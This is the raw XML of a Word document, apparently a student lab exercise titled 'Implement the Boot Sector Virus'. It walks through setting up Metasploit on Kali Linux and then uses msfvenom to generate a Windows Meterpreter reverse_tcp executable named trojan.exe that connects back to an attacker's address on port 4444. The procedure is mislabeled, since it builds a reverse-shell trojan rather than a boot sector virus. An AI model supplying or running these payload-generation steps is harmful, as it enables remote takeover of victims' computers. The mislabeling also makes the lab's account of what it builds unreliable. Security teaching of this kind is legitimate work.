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305" w:rsidRPr="00FF7D8D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="123" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="421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</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF7D8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPLEMENT THE BOOT SECTOR VIRUS    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1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C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="123" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="42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AIM: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2256"/>
        </w:tabs>
        <w:spacing w:after="132" w:line="249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To implement boot sector virus.    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="161" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="42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PROCEDURE:            </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="95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Select Root Terminal   Emulator   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="123" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="421" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Step 1: Update and Upgrade Kali Linux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3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="125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Open the terminal and type </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in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apt-get update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3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="123" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="421" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, type in: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apt-get upgrade </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="232" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="42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3: Fix any errors </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187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If you see this, it means that bundler is either set up incorrectly or hasn’t been updated. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187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To fix this, change the current directory (file) to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>metasploit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-framework by typing in: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="185" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="42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&gt;&gt; cd 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/share/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metasploit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-framework/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="411" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="2186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from the root directory. If you make a mistake, you can type in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     &gt;&gt; cd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to go back to the previous directory or type in any directory after cd to go there. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="411" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="3587" w:hanging="10"/>
      </w:pPr>
      <w:r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.Now that we are in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>metasploit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-framework directory, type in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      &gt;&gt; gem install bundler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to install bundler, then type in </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="188" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="42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&gt;&gt; bundle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install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3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="69" w:line="353" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="798" w:hanging="10"/>
        <w:jc w:val="both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4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.If bundler is not the correct version, you should get a message telling you which version to install (in this case it was 1.17.3). Type in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     &gt;&gt; gem install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</w:rPr>
        <w:t>bundler:[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</w:rPr>
        <w:t>version number]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and then type in :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gem update –system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:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="175"/>
        <w:ind w:left="-5" w:right="798" w:hanging="10"/>
        <w:jc w:val="both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After all of that, everything should work perfectly. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="410" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="681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&gt;&gt; cd /root     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to go back to the root directory.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C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="123" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="42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2: Open exploit software </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187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Open up the terminal and type </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in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msfvenom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3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="188" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="421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Step 4: Choose our payload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3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187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To see a list of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payloads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msfvenom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-l payload </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="249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5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Customize our payload </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="188" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="421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msfvenom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–list-options -p windows/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meterpreter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reverse_tcp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C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="48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6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Generate the virus </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187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Now that we have our payload, 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address, and port number, we have all the information that we need.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187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Type in: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="187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Syntax: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="102" w:line="324" w:lineRule="auto"/>
        <w:ind w:right="1156"/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msfvenom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-p [payload] LHOST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your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address] LPORT=[the port number] -f [file type] &gt; [path] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Example </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="225" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="421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msfvenom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-p windows/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meterpreter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reverse_tcp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LHOST=192.168.1.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253  LPORT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=4444 -f exe  &gt; trojan.exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="143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If we look in our files using ls, we see that our new file pops up.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C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10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OUTPUT: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305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6210300" cy="4951057"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1200" name="Group 1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4951057"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6210300" cy="4951057"/>
                        </a:xfrm>
                      </wpg:grpSpPr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2607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24874"/>
                            <a:ext cx="6201410" cy="22261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0" style="width:489pt;height:389.847pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="62103,49510">
                <v:shape id="Picture 162" style="position:absolute;width:62103;height:26073;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId6"/>
                </v:shape>
                <v:shape id="Picture 164" style="position:absolute;width:62014;height:22261;left:0;top:27248;" filled="f">
                  <v:imagedata r:id="rId7"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1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3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="105"/>
        <w:ind w:right="751"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="259588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3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after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3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="105"/>
        <w:ind w:right="751"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="258699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F7D8D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="48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RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3305" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="481" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hence boost sector virus implemented successfully. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003C3305">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1449" w:right="624" w:bottom="14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305"/>
    <w:rsid w:val="003C3305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352E"/>
  <w15:docId w15:val="{CFD2FE05-264B-45CC-9BEA-78104147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Divya Bodala</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-11T08:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-11T08:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>